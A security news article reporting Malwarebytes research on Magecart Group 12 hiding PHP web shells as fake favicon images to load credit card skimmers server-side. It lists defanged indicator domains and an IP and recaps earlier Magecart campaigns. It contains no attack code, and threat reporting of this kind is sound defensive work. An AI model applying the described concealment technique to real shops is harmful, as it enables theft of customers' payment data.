A new PHP-based skimmer has been discovered, revealing continuous Magecart Group 12 activity. Read on to know more…
Malicious PHP web shells disguised as favicons are being propagated by Magecart Group 12, a group of hackers who attack online businesses and e-commerce websites. The group can maintain remote access to the targeted servers via web shells. Then, in order to steal financial information, JavaScript skimmers are introduced into online shopping platforms.
Working Mechanism
According to a lead malware threat intelligence analyst at Malwarebytes, Jérôme Segura, observed that malicious PHP web shells known as Megalodon or Smilodon are used to dynamically load JavaScript skimming code into online retailers using server-side requests.
Instead of legitimate shortcut icon tags, the PHP-based web shell malware is concealed on the targeted sites as a favicon with a path to fake PNG image files. This web shell is then set up to get the next-stage payload from an external host, which is a credit card skimmer that looks identical to previous Cardbleed variations.
In most cases, inserted skimmers perform a client-side request to an external JavaScript resource hosted on an attacker-controlled domain, however in newer assaults, this has been done on the server-side. These types of attacks known as Formjacking attacks are known to have a hidden JavaScript skimmer code inside a single or numerous e-commerce websites by its malicious operators.
Malwarebytes Jérôme Segura noted in a Thursday write-up that “These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online stores,”
“This technique is interesting as most client-side security tools will not be able to detect or block the skimmer.”
Based on tactics, techniques, and procedures used, Malwarebytes attributed the newest attack to Magecart Group 12, adding adding “the newest domain name we found (zolo[.]pw) happens to be hosted on the same IP address (217.12.204[.]185) as recaptcha-in[.]pw and google-statik[.]pw, domains previously associated with Magecart Group 12.”
Past Attacks
Magecart attacks are getting more widespread, and they have recently attacked a number of online platforms around the world. Web shells were being used to insert JavaScript-based credit card skimmers into hacked online retailers in web skimming or Magecart attacks last month, according to VISA.
Magecart-style attacks were discovered in February exploiting Google’s Apps Script business application development platform to steal credit card information.
In September 2020, Magecart 12 threat actors were also implicated for a wave of attacks that used another novel skimmer, called “Ant and Cockroach” by RiskIQ, which impacted over 3,000 Magento 1 domains.
Concluding Words
Magecart attackers have stepped up its efforts to infiltrate online retailers by using a variety of attack vectors to stay under the radar, escape detection, and steal data during the last several months. Skimming has also become a popular and profitable industry for cybercriminals.
From leveraging Google Analytics and Telegram as an exfiltration channel to planting card stealer code inside image metadata and carrying out IDN homograph attacks to plant web skimmers hidden within a website’s favicon file, the cybercrime syndicate has ramped up its efforts to breach online stores.
As a result, it is suggested that businesses defend themselves by implementing security measures to detect and prevent such skimming attempts.